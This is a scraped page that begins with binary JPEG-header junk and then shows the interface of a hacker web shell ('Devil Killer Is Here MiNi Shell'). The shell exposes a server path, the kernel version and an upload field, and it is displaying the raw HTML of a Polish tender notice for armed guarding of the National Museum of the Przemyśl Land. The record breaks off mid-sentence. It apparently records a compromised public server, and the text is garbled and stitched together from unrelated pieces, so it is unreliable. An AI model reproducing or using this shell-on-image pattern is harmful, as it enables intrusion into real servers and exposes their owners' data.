JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20241104/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20241104/0057553901-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> OCHRONA FIZYCZNA OSÓB I MIENIA ŚWIADCZONA DLA MUZEUM NARODOWEGO ZIEMI PRZEMYSKIEJ W PRZEMYŚLU </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Muzeum Narodowe Ziemi Przemyskiej</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">MNZP</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 650964743</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac płk. Berka Joselewicza 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Przemyśl</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">37-700</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL822 - Przemyski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">administracja@mnzp.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mnzp.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Muzeum </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> OCHRONA FIZYCZNA OSÓB I MIENIA ŚWIADCZONA DLA MUZEUM NARODOWEGO ZIEMI PRZEMYSKIEJ W PRZEMYŚLU </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-bc6752ed-989b-4ea6-9c81-b4ffc6952a71</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00575539</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-11-04</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00574204/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Usługa ochrony fizycznej osób i mienia świadczona dla Muzeum Narodowego Ziemi Przemyskiej w Przemyślu</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/mnzp <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/mnzp</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Postępowanie prowadzone jest w języku polskim w formie elektronicznej za pośrednictwem platformazakupowa.pl pod adresem:<br/>https://platformazakupowa.pl/pn/mnzp . Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia<br/>publicznego - akceptuje warunki korzystania z platformy zakupowej , określone w Regulaminie zamieszczonym na stronie<br/>internetowej w zakładce REGULAMIN oraz uznaje go za wiążący. - zapoznał i stosuje się do Instrukcji składania ofert/wniosków<br/>dostępnej pod adresem: https://platformazakupowa.pl/strona/45instrukcje</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający spełnia wymogi określone w Rozp. Parlamentu Europejskiego i Rady(UE)2016/679 z 27.04. 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarz.danych osobowych i w sprawie swobodnego przepływu danych oraz uchylenia dyrektywy 95/46/WE (Dz.Urz. UE L 119 z 4.05. 2016 r.), dalej: RODO, dane osobowe podane przez wykonawcę będą przetwarzane zgodnie z RODO i zgodnie z przepis. krajowymi. Dane osobowe wykonawcy będą przetwarzane na podst.art. 6 ust. 1 lit. c RODO w celu związanym z przedmiot. postępow. o udzielenie zamówienia publ. Usługa ochrony fizycznej osób i mienia dla Muzeum Narodowego Ziemi Przemyskiej w Przemyślu Odbiorcami przekazanych przez wykonawcę danych będą osoby lub podmioty, którym zostanie udostęp. dokumen.z art. 96 ust. 3 Pzp, i art. 6 ustawy z 6 .09. 2001 r. o dostępie do info.publicz.Dane osobowe wykonawcy zawarte w protokole postęp. będą przechowyw. przez okres 4 lat, od dnia zakończenia postępowania, a jeżeli czas trwania umowy przekracza 4 lata, okres przechow. obejmuje cały czas trwania umowy. Klauzula info. w art. 13 ust. 1 i 2 RODO znajduje się w zał.nr 5 do SWZ. Zamawiający nie planuje przetwarz. danych osobow. wykonawcy w celu innym niż cel określony w lit. b pow. Jeżeli administr. będzie planował przetwarzać dane osobowe w celu innym<br/>niż cel, (tj. cel określony w lit. b pow.), przed takim dalszym przetwarzaniem poinformuje on osobę, której dane dotyczą, o tym celu oraz udzieli jej wszelkich innych stosownych info, o których mowa w art. 13 ust. 2 RODO. Wykonawca jest zobowiązany, w związku z udziałem w przedmiot. postęp, do wypełnienia wszystkich obowiązków formalno-prawnych wymag. przez RODO. Do obowiązków tych należą: info. przewidziany w art. 13 RODO względem osób fiz., których dane osobowe dotyczą i od których dane te wykonawca bezpośr. pozyskał i przekazał zamawiającemu w treści oferty lub dokumentów składanych na żądanie zamawiającego; obowiązek info. wynikający z art. 14 RODO względem osób fizycznych, których dane wykonawca pozyskał w sposób pośredni, a które to dane wykonawca przekazuje zamawiającemu w treści oferty lub dokumentów składanych na żądanie zamawiającego. W celu zapewnienia, że wykonawca wypełnił ww. obowiązki informacyjne oraz ochrony prawnie uzasadnionych interesów osoby trzeciej, której dane zostały przekazane w związku z udziałem w postępowaniu, wykonawca składa oświadczenia o wypełnieniu przez niego obowiązków informacyjnych przewidzianych w art. 13 lub art. 14 RODO – treść oświadczenia została zawarta w zał. nr 2 do SWZ formularz oferty (pkt 15).Zamawiający informuje, że: Zamawiający udostępnia dane osobowe, o których mowa w art. 10 RODO<br/>(daneosob. dotyczące wyroków skazujących i czynów zabronionych) do upływu terminu na ich wniesienie. Udostępnianie protokołu i załączników do protokołu ma zastosowanie do wszystkich danych osobowych, z wyjątkiem tych, o których mowa w art. 9 ust.<br/>1RODO (tj. danych osobowych ujawniających pochodzenie rasowe lub etniczne, poglądy polityczne, przekonania religijne lub<br/>światopoglądowe, przynależność do związków zawodowych oraz przetwarzania danych genetycznych, danych biometrycznych w<br/>celu jednoznacznego zidentyfikowania osoby fizycznej lub danych dotyczących zdrowia, seksualności lub orientacji seksualnej tej<br/>osoby), zebranych w toku postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ADM.261.12.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia są usługi ochroniarskie, wykonywane dla MNZP na podstawie i zgodnie z przepisami ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (Dz. U. z 2021r. poz. 1995 ze zm.) i z aktami wykonawczymi do ustawy.<br/>2.	Ochrona stała – realizowana nieprzerwanie przez całą dobę (dwie zmiany) i 7 dni w tygodniu przy pl. płk. Berka Joselewicza 1 w Przemyślu przez specjalistyczne uzbrojone formacje ochronne, w ramach jednoosobowej obsady, na posterunku z obowiązkiem wykonywania obchodów.<br/>3.	Ochrona czasowa – realizowana w godzinach udostępniania publicznie wystaw i zbiorów muzealnych przy pl. płk. Berka Joselewicza 1 w Przemyślu (od wtorku do niedzieli, tj.: 39 godzin tygodniowo) przez specjalistyczne uzbrojone formacje ochronne, w ramach jednoosobowej obsady, wykonywana metodą patrolową.<br/>4.	Obchód – realizowany przez osobę nadzorującą (wskazaną w księdze realizacji umowy), posiadającą stosowne kwalifikacje, tj. wpis na listę kwalifikowanych pracowników ochrony oraz dopuszczoną do pracy z bronią. Obchód wykonywany będzie przynajmniej raz w miesiącu w celu bieżącego sprawdzenia sprawowanej ochrony oraz doraźnemu rozpoznaniu zagrożeń.<br/>5.	Stały dozór sygnałów alarmowych – realizowany nieprzerwanie przez całą dobę (dwie zmiany) i 7 dni w tygodniu, polegający na nadzorowaniu i monitorowaniu sygnałów alarmów włamaniowych, pożarowych oraz napadowych do zewnętrznego uzbrojonego stanowiska interwencyjnego z systemów alarmowych zainstalowanych w dziewięciu obiektach Zamawiającego, znajdujących się przy pl. płk. Berka Joselewicza 1 w Przemyślu, <br/>ul. Rynek 9 i Serbańska 7 w Przemyślu, ul. Władycze 3 w Przemyślu, ul. T. Kościuszki 2 w Przemyślu oraz przy ul. S. Rogozińskiego 30 w Przemyślu.<br/>6.	Ochrona realizowana nieprzerwanie przez całą dobę (dwie zmiany) i 7 dni w tygodniu – polegająca na zapewnieniu użycia uzbrojonych grup interwencyjnych (min. dwóch kwalifikowanych pracowników ochrony w składzie grupy interweniującej) w sytuacji zasygnalizowanego zagrożenia z obiektów Zamawiającego. Wymagany czas dojazdu grupy interwencyjnej – wskazany w ofercie (maksymalnie do 10 minut).<br/>7.	Ochrona okazjonalna (posterunek doraźny, konwój) – polegająca na zapewnieniu przez specjalistyczne uzbrojone formacje ochronne: konwojów zbiorów, zabezpieczania imprez lub innych sytuacji nadzwyczajnych wymagających ochrony (na podstawie dodatkowego zlecenia według ustalonej stawki godzinowej podanej w formularzu ofertowym).Wymagane od Wykonawcy wyposażenie i uzbrojenie:<br/>1)	obowiązujące na terenie MNZP: broń palna bojowa z amunicją, urządzenia przeznaczone do obezwładniania osób za pomocą energii elektrycznej pow. 10mA, pałki służbowe, kajdanki zakładane na ręce, telefony komórkowe, urządzenia monitorujące Active Guard (z obowiązkiem montażu), maski przeciwgazowe, latarki, opatrunki osobiste, materiały niezbędne do prowadzenia dokumentacji.<br/>2)	grupy interwencyjnej – dla każdego kwalifikowanego pracownika ochrony: broń palna bojowa z normatywem amunicji, pałka służbowa, kajdanki zakładane na ręce, ubiór służbowy z logo koncesjonowanego przedsiębiorcy wraz <br/>z identyfikatorem osobistym, hełm kuloodporny, kamizelka kuloodporna <br/>i opatrunek osobisty; oraz grupa interwencyjna powinna dysponować oznakowanym samochodem służbowym, ręcznym miotaczem substancji obezwładniających, telefonami bezprzewodowymi (komórkowy, radiotelefon), latarką patrolową, podręcznym sprzętem gaśniczym, apteczką;<br/>3)	uzbrojonego stanowiska interwencyjnego: co najmniej jedna jednostka broni palnej bojowej z połową normatywu amunicji;<br/>4)	posterunku doraźnego: broń palna bojowa z normatywem amunicji dla każdego kwalifikowanego pracownika ochrony;<br/>5)	w zakresie konwoju transportu zbiorów (organizacja oraz wyposażenie i uzbrojenie konwojentów) na podstawie i zgodnie z załącznikiem nr 3 do rozporządzenia Ministra Kultury i Dziedzictwa Narodowego z dnia 2 września 2014 r. w sprawie zabezpieczania zbiorów muzeum przed pożarem, kradzieżą<br/> i innym niebezpieczeństwem grożącym ich zniszczeniem lub utratą oraz rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 7 września 2010 r. w sprawie wymagań, jakim powinna odpowiadać ochrona wartości pieniężnych przechowywanych i transportowanych przez przedsiębiorców i inne jednostki organizacyjne (Dz.U. z 2016 r. poz. 793 ze zm.). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79710000-4 - Usługi ochroniarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-01 do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">: 1. Zamawiający przy wyborze najkorzystniejszej oferty będzie kierował się następującymi kryteriami:<br/>1) cena za realizację zamówienia (C) – 60%=60pkt.<br/>C = (CN/CB) x 60 pkt<br/>C – ilość punktów w kryterium cena<br/>CN – cena najniższa<br/>CB – cena badana<br/>Przeliczeniu wg podanego wzoru podlegała będzie wartość brutto (ogółem). Oferta przedstawiająca najniższą sumę wartości brutto<br/>uzyska maksymalną liczbę punktów: 60. Pozostałe oferty otrzymają odpowiednio mniejszą ilość punktów wyliczonych – wg<br/>powyższego opisu.<br/>Wpisać wartość w załączniku nr 2 do SWZ<br/>2) doświadczenie personelu (D) – 30 %=30pkt.<br/>30 pkt – otrzyma Wykonawca, który skieruje do realizacji zamówienia 100 procent osób (przez cały okres umowy), które w okresie<br/>ostatnich 3 lat co najmniej jeden rok wykonywały usługę (udokumentowaną) w zakresie bezpośredniej ochrony fizycznej w ramach<br/>specjalistycznych uzbrojonych formacji ochronnych – wymaganie dotyczy pracowników, którzy będą wykonywać usługę na terenie<br/>MNZP.<br/>0 pkt - otrzyma Wykonawca, który skieruje do realizacji zamówienia osoby, które w okresie ostatnich trzech lat nie wykonywały usługi<br/>w zakresie bezpośredniej ochrony fizycznej w ramach specjalistycznych uzbrojonych formacji ochronnych.<br/>Wpisać wartość w załączniku nr 2 do SWZ<br/>3) szybkości reakcji grupy interwencyjnej (I) – 10 %=10pkt.<br/>0 pkt – otrzyma Wykonawca, który zaoferuje czas reakcji i dojazdu grupy interwencyjnej powyżej 7 minut<br/>10 pkt – otrzyma Wykonawca, który zaoferuje czas reakcji i dojazdu grupy interwencyjnej w przedziale do 7 minut.<br/>Maksymalny czas reakcji i dojazdu grupy interwencyjnej nie może przekroczyć 10 minut pod rygorem odrzucenia oferty.<br/>Wpisać wartość w załączniku nr 2 do SWZ<br/>2. Zamawiający dokona wyboru oferty tego z wykonawców, którego oferta uzyska w wyniku oszacowania najwyższą liczbę punktów.<br/>Przyznanie punktów odbędzie się w oparciu o następujący wzór:<br/>Ocena oferty = C + D + I<br/>gdzie:<br/>C – liczba punktów za kryterium: cena brutto oferty<br/>D – liczba punktów za kryterium: doświadczenie personelu<br/>I – liczba punktów za kryterium: szybkość reakcji grupy interwencyjnej<br/>Maksymalna liczba punktów jaką po zsumowaniu punktów dla każdego kryterium może uzyskać oferta – 100 pkt. Ocena ofert<br/>dokonywana będzie z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie personelu (D)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">szybkość reakcji grupy interwencyjnej (I)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1)	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie określa warunku odnośnie zdolności podmiotu do występowania w obrocie gospodarczym.<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>- wykonawca spełni warunek jeżeli posiada aktualną koncesję Ministra Spraw Wewnętrznych i Administracji wydaną na podstawie ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (tj. Dz.U. 2021 r., poz. 1995 ze zm.) na prowadzenie działalności gospodarczej w zakresie usług ochrony osób i mienia realizowanej w formie bezpośredniej ochrony fizycznej i zabezpieczenia technicznego.<br/>3)	sytuacji ekonomicznej lub finansowej:<br/>- wykonawca musi posiadać zdolność kredytową która musi być zdolnością realną, aktualną na dzień składania wniosków o dopuszczenie do udziału <br/>w postępowaniu (na dzień składania ofert)<br/>- wykonawca spełni warunek, jeżeli posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie niższą niż 100 000 zł.<br/>4)	zdolności technicznej lub zawodowej:<br/>- warunki dotyczące wykształcenia, kwalifikacji zawodowych, doświadczenia, potencjału technicznego wykonawcy lub osób skierowanych przez wykonawcę do realizacji zamówienia, umożliwiające realizację zamówienia na odpowiednim poziomie jakości.<br/>a)	należycie wykonał lub należycie wykonuje w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej 2 usługi o charakterze i złożoności porównywalnych z przedmiotem i zakresem niniejszego zamówienia. Każda usługa musi być świadczona na podstawie odrębnej umowy, trwającej nieprzerwanie min. 6 miesięcy, o wartości brutto min. 150 000,00 zł. Za usługę wykonywaną w okresie ostatnich 3 lat przed upływem terminu składania ofert zamawiający uzna usługę, której data rozpoczęcia przypada w tym okresie.<br/>Poprzez zamówienie o charakterze i złożoności porównywalnych z przedmiotem i zakresem zamówienia należy rozumieć ochronę osób i mienia w formie bezpośredniej ochrony fizycznej. W sytuacji, gdy wykonawca na potwierdzenie spełniania warunku zdolności technicznej lub zawodowej, wykaże usługę będącą w trakcie realizacji, zamawiający wymaga, aby na dzień składania ofert, usługa była świadczona nieprzerwanie przez okres min. 6 miesięcy.<br/>b)	dysponuje i skieruje do realizacji zamówienia kwalifikowanych pracowników ochrony fizycznej (wpis do wykazu pracowników kwalifikowanych i pozwolenie na broń), niekaranych za przestępstwo umyślne, zapewniając możliwość podjęcia skutecznych działań w określonym czasie zgodnie z wymaganiami zamawiającego określonymi w Zał. nr 1 – Szczegółowym opisie Przedmiotu Zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">oświadczenie w zakresie w art. 108 ust. 1 pkt 5 ustawy Pzp dotyczącego zawarcia z innymi Wykonawcami porozumienia mającego na celu zakłócenie konkurencji, w szczególności jeżeli należąc do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. 2023.1689), złożyli odrębne oferty, oferty częściowe lub wnioski o dopuszczenie do udziału w postępowaniu, chyba że wykażą, że przygotowali te oferty lub wnioski niezależnie od siebie – wzór oświadczenia stanowi Załącznik Nr 9 do SWZ;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">-aktualną koncesję Ministra Spraw Wewnętrznych i Administracji wydaną na podstawie ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (tj. Dz.U. 2021.1995 ze zm.) na prowadzenie działalności gospodarczej w zakresie usług ochrony osób i mienia realizowanej w formie 